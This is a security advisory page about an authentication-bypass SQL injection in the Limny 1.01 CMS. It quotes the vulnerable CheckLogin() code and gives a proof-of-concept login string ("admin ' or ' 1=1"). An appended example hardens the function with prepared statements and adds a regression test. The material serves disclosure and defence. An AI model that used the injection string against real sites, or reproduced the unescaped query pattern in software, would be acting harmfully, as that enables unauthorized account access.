Limny 1.01 SQL Injection

2009-07-28T00:00:00
ID PACKETSTORM:79697
Type packetstorm
Reporter SirGod
Modified 2009-07-28T00:00:00

Description

                                        
`###########################################################################################  
[+] Limny 1.01 (Auth Bypass) SQL Injection Vulnerability  
[+] Discovered By SirGod  
[+] http://insecurity-ro.org  
[+] http://h4cky0u.org  
############################################################################################  
  
[+] Script Homepage : http://www.limny-project.com/  
  
[+] SQL Injection Vulnerability  
  
- Note : exploitable only when magic_quotes_gpc = off  
  
- Vulnerable code in includes/functions.php  
  
--------------------------------------------------------------------------------------------  
  
function CheckLogin($username, $password)  
{  
    global $db;  
    // $username and $password are interpolated into the SQL string unescaped  
    $query = $db->query("SELECT user, pass FROM ".TABLE_PREFIX."users  
        WHERE user='$username' AND pass='$password'");  
    if($check = $db->fetch_array($query))  
    {  
        return true;  
    }else{  
        return false;  
    }  
}  
  
--------------------------------------------------------------------------------------------  
  
- PoC  
  
Username : [REAL-ADMIN-NAME] ' or ' 1=1  
Password : anything  
  
[REAL-ADMIN-NAME] is usually admin  
  
############################################################################################  
  
`
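
A hardened form of the CheckLogin() routine quoted above, with a small regression check that feeds it the advisory's username string. This is an added example, not Limny code and not from the advisory author. The PDO connection, the in-memory SQLite database (needs the pdo_sqlite extension), the unprefixed `users` table, and the use of password_hash() for the stored value are assumptions; the advisory does not say how Limny stores passwords, so the hashing step goes beyond what the page shows.

```php
<?php
// Added example, not Limny code. Table layout, PDO/SQLite and password_hash()
// storage are assumptions made so the script runs stand-alone.
declare(strict_types=1);

// Hash verified for unknown users so both failure paths do similar work.
define('DUMMY_HASH', password_hash('placeholder', PASSWORD_DEFAULT));

function checkLogin(PDO $db, string $username, string $password): bool
{
    // Bound parameter: the username travels as data and is never parsed as SQL,
    // so quotes in it cannot change the WHERE clause.
    $stmt = $db->prepare('SELECT pass FROM users WHERE user = :user');
    $stmt->execute([':user' => $username]);
    $hash = $stmt->fetchColumn();

    if ($hash === false) {
        password_verify($password, DUMMY_HASH);
        return false;
    }
    // The password is compared in PHP against a stored hash, not inside the query.
    return password_verify($password, $hash);
}

// Constructed test database with one account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (user TEXT PRIMARY KEY, pass TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (user, pass) VALUES (?, ?)');
$ins->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

// Constructed regression cases; the second username is the string from the advisory.
$cases = [
    ['admin', 'correct horse', true],
    ["admin ' or ' 1=1", 'anything', false],
    ['admin', 'anything', false],
];
foreach ($cases as [$user, $pass, $expected]) {
    $got = checkLogin($db, $user, $pass);
    printf("%-18s %-14s => %-5s %s\n", $user, $pass,
        var_export($got, true), $got === $expected ? 'ok' : 'FAIL');
}
```

Because the fix is in how the query is built, it holds regardless of the magic_quotes_gpc setting the advisory lists as a precondition.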